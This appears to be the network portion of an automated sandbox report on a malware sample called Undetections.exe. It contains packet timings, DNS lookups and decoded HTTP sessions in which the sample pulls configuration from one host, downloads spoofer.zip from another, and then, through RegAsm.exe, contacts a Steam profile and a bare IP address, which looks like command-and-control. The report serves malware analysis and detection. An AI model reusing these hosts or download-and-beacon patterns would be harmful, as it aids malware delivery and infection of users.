                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437829971 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437869072 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437910080 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437923908 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437957048 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437977076 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440665007 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440705061 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440751076 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440763950 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440792084 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440815926 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.443434000 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.443471909 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.443622112 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.221237898 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258485079 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258507013 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258620977 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258635998 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258696079 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.290539026 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.290581942 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.290786028 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.290801048 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.291182041 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.317840099 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.317879915 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.317970037 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.317975044 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.318007946 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.318031073 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336463928 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336483955 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336703062 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336718082 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336777925 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355647087 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355665922 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355742931 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355756044 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355808020 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.374977112 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375019073 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375066996 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375078917 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375112057 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375132084 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392276049 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392338037 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392370939 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392385960 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392414093 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392436028 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392467976 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392527103 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.393013000 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.393044949 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.496515989 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.496579885 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.496692896 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.496994019 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.497018099 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.904500008 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.904620886 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.905266047 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.905294895 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.905519009 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.905530930 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541742086 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541863918 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541908026 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541913986 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541971922 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.542004108 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.542035103 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.542078018 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.630958080 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631027937 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631119967 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631170988 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631206989 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631237030 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760679007 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760750055 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760837078 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760878086 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760910988 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760937929 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.854940891 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855005980 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855036974 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855089903 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855123997 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855146885 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914747000 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914823055 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914871931 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914899111 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914927006 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914959908 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.915375948 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.915405035 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.915469885 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109390974 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109428883 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109518051 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109810114 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109822989 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.516544104 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.516645908 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517256021 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517263889 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517488956 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517494917 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517517090 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517527103 CEST4434976495.217.212.139192.168.2.4
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Apr 10, 2024 08:56:07.181576967 CEST | 192.168.2.4 | 172.253.115.113 | 4d5a | | Echo
Apr 10, 2024 08:56:07.274513006 CEST | 172.253.115.113 | 192.168.2.4 | 555a | | Echo Reply
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 10, 2024 08:56:05.767522097 CEST | 192.168.2.4 | 1.1.1.1 | 0xb384 | Standard query (0) | universalbeure.usite.pro | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:07.084978104 CEST | 192.168.2.4 | 1.1.1.1 | 0xb547 | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:12.161106110 CEST | 192.168.2.4 | 1.1.1.1 | 0x6814 | Standard query (0) | ashjghas.ucoz.net | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:15.243285894 CEST | 192.168.2.4 | 1.1.1.1 | 0x4c2b | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 10, 2024 08:56:06.037813902 CEST | 1.1.1.1 | 192.168.2.4 | 0xb384 | No error (0) | universalbeure.usite.pro | | 193.109.246.100 | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:07.178184032 CEST | 1.1.1.1 | 192.168.2.4 | 0xb547 | No error (0) | google.com | | 172.253.115.113 | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:07.178184032 CEST | 1.1.1.1 | 192.168.2.4 | 0xb547 | No error (0) | google.com | | 172.253.115.138 | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:07.178184032 CEST | 1.1.1.1 | 192.168.2.4 | 0xb547 | No error (0) | google.com | | 172.253.115.102 | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:07.178184032 CEST | 1.1.1.1 | 192.168.2.4 | 0xb547 | No error (0) | google.com | | 172.253.115.139 | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:07.178184032 CEST | 1.1.1.1 | 192.168.2.4 | 0xb547 | No error (0) | google.com | | 172.253.115.100 | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:07.178184032 CEST | 1.1.1.1 | 192.168.2.4 | 0xb547 | No error (0) | google.com | | 172.253.115.101 | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:12.256167889 CEST | 1.1.1.1 | 192.168.2.4 | 0x6814 | No error (0) | ashjghas.ucoz.net | | 193.109.246.100 | A (IP address) | IN (0x0001) | false
Apr 10, 2024 08:56:15.336468935 CEST | 1.1.1.1 | 192.168.2.4 | 0x4c2b | No error (0) | steamcommunity.com | | 104.102.129.112 | A (IP address) | IN (0x0001) | false
• universalbeure.usite.pro
• ashjghas.ucoz.net
• steamcommunity.com
• 95.217.212.139
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 193.109.246.100 | 443 | 7308 | C:\Users\user\Desktop\Undetections.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:06 UTC | 103 | OUT | GET /STLprograms/NEW/z-Closing.txt HTTP/1.1
    Host: universalbeure.usite.pro
    Connection: Keep-Alive
2024-04-10 06:56:07 UTC | 324 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 10 Apr 2024 06:56:05 GMT
    Content-Type: text/plain
    Content-Length: 3
    Last-Modified: Thu, 21 Mar 2024 15:19:47 GMT
    Connection: close
    ETag: "65fc5013-3"
    Expires: Tue, 30 Apr 2024 06:56:05 GMT
    Cache-Control: max-age=1728000
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
2024-04-10 06:56:07 UTC | 3 | IN | Data Raw: 31 30 30
    Data Ascii: 100


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 193.109.246.100 | 443 | 7308 | C:\Users\user\Desktop\Undetections.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:07 UTC | 74 | OUT | GET /STLprograms/NEW/hwid.txt HTTP/1.1
    Host: universalbeure.usite.pro
2024-04-10 06:56:08 UTC | 327 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 10 Apr 2024 06:56:06 GMT
    Content-Type: text/plain
    Content-Length: 183
    Last-Modified: Tue, 26 Mar 2024 11:07:32 GMT
    Connection: close
    ETag: "6602ac74-b7"
    Expires: Tue, 30 Apr 2024 06:56:06 GMT
    Cache-Control: max-age=1728000
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
2024-04-10 06:56:08 UTC | 183 | IN | Data Raw: 53 2d 31 2d 35 2d 32 31 2d 31 38 37 38 35 36 33 38 36 33 2d 32 36 32 37 33 37 33 32 30 37 2d 33 31 31 34 31 32 37 33 33 33 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 32 34 39 39 36 32 30 37 39 39 2d 32 34 31 35 33 31 36 38 39 31 2d 38 37 34 30 38 34 35 34 36 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 31 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31
    Data Ascii: S-1-5-21-1878563863-2627373207-3114127333-1001
    S-1-5-21-2499620799-2415316891-874084546-1001
    S-1-5-21-32078755-17691142541-1048030575-1001
    S-1-5-21-32078755-1769114254-1048030575-1001


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 193.109.246.100 | 443 | 7308 | C:\Users\user\Desktop\Undetections.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:08 UTC | 83 | OUT | GET /STLprograms/NEW/qwxisix/hwids.txt HTTP/1.1
    Host: universalbeure.usite.pro
2024-04-10 06:56:09 UTC | 326 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 10 Apr 2024 06:56:07 GMT
    Content-Type: text/plain
    Content-Length: 45
    Last-Modified: Mon, 01 Apr 2024 20:18:36 GMT
    Connection: close
    ETag: "660b169c-2d"
    Expires: Tue, 30 Apr 2024 06:56:07 GMT
    Cache-Control: max-age=1728000
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
2024-04-10 06:56:09 UTC | 45 | IN | Data Raw: 53 2d 31 2d 35 2d 32 31 2d 31 34 36 32 30 36 30 31 32 35 2d 36 37 30 32 35 39 39 33 36 2d 32 32 36 32 34 37 33 38 30 37 2d 31 30 30 31
    Data Ascii: S-1-5-21-1462060125-670259936-2262473807-1001


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49737 | 193.109.246.100 | 443 | 7308 | C:\Users\user\Desktop\Undetections.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:09 UTC | 100 | OUT | GET /STLprograms/NEW/qwxisix/Undetections/BuildLink.txt HTTP/1.1
    Host: universalbeure.usite.pro
2024-04-10 06:56:10 UTC | 326 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 10 Apr 2024 06:56:08 GMT
    Content-Type: text/plain
    Content-Length: 37
    Last-Modified: Tue, 02 Apr 2024 16:31:09 GMT
    Connection: close
    ETag: "660c32cd-25"
    Expires: Tue, 30 Apr 2024 06:56:08 GMT
    Cache-Control: max-age=1728000
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
2024-04-10 06:56:10 UTC | 37 | IN | Data Raw: 68 74 74 70 73 3a 2f 2f 61 73 68 6a 67 68 61 73 2e 75 63 6f 7a 2e 6e 65 74 2f 73 70 6f 6f 66 65 72 2e 7a 69 70
    Data Ascii: https://ashjghas.ucoz.net/spoofer.zip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 193.109.246.100 | 443 | 7308 | C:\Users\user\Desktop\Undetections.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:10 UTC | 100 | OUT | GET /STLprograms/NEW/qwxisix/Undetections/BuildName.txt HTTP/1.1
    Host: universalbeure.usite.pro
2024-04-10 06:56:11 UTC | 325 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 10 Apr 2024 06:56:09 GMT
    Content-Type: text/plain
    Content-Length: 11
    Last-Modified: Tue, 02 Apr 2024 16:31:09 GMT
    Connection: close
    ETag: "660c32cd-b"
    Expires: Tue, 30 Apr 2024 06:56:09 GMT
    Cache-Control: max-age=1728000
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
2024-04-10 06:56:11 UTC | 11 | IN | Data Raw: 73 70 6f 6f 66 65 72 2e 65 78 65
    Data Ascii: spoofer.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49740 | 193.109.246.100 | 443 | 7308 | C:\Users\user\Desktop\Undetections.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:11 UTC | 103 | OUT | GET /STLprograms/NEW/qwxisix/Undetections/BuildZipName.txt HTTP/1.1
Host: universalbeure.usite.pro
2024-04-10 06:56:12 UTC | 325 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:10 GMT
Content-Type: text/plain
Content-Length: 11
Last-Modified: Tue, 02 Apr 2024 16:31:09 GMT
Connection: close
ETag: "660c32cd-b"
Expires: Tue, 30 Apr 2024 06:56:10 GMT
Cache-Control: max-age=1728000
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
2024-04-10 06:56:12 UTC | 11 | IN | Data Raw: 73 70 6f 6f 66 65 72 2e 7a 69 70
Data Ascii: spoofer.zip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49741 | 193.109.246.100 | 443 | 7308 | C:\Users\user\Desktop\Undetections.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:13 UTC | 78 | OUT | GET /spoofer.zip HTTP/1.1
Host: ashjghas.ucoz.net
Connection: Keep-Alive
2024-04-10 06:56:13 UTC | 338 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:12 GMT
Content-Type: application/zip
Content-Length: 215501
Last-Modified: Mon, 08 Apr 2024 12:39:02 GMT
Connection: close
ETag: "6613e566-349cd"
Expires: Tue, 30 Apr 2024 06:56:12 GMT
Cache-Control: max-age=1728000
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49742 | 104.102.129.112 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:15 UTC | 119 | OUT | GET /profiles/76561199662282318 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:15 UTC | 1882 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Wed, 10 Apr 2024 06:56:15 GMT
Content-Length: 34667
Connection: close
Set-Cookie: sessionid=30ba0b649cebdb544c908c56; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C6a48c77af2572e5bf5294ad967f9240e; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                          2024-04-10 06:56:15 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                          2024-04-10 06:56:16 UTC10074INData Raw: 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 69 6e 73 74 61 6c 6c 73 74 65 61 6d 5f 62 74 6e 20 68 65 61 64 65 72
                                                                                                                                                                                                          Data Ascii: ent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header
2024-04-10 06:56:16 UTC | 10091 | IN |
                                                                                                                                                                                                          Data Ascii: ;https:\/\/store.cloudflare.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot;https:\/\/steamcommunity.com\/&quot;,&quot;CHAT_BASE_URL&qu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49743 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:16 UTC | 234 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
2024-04-10 06:56:17 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:17 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
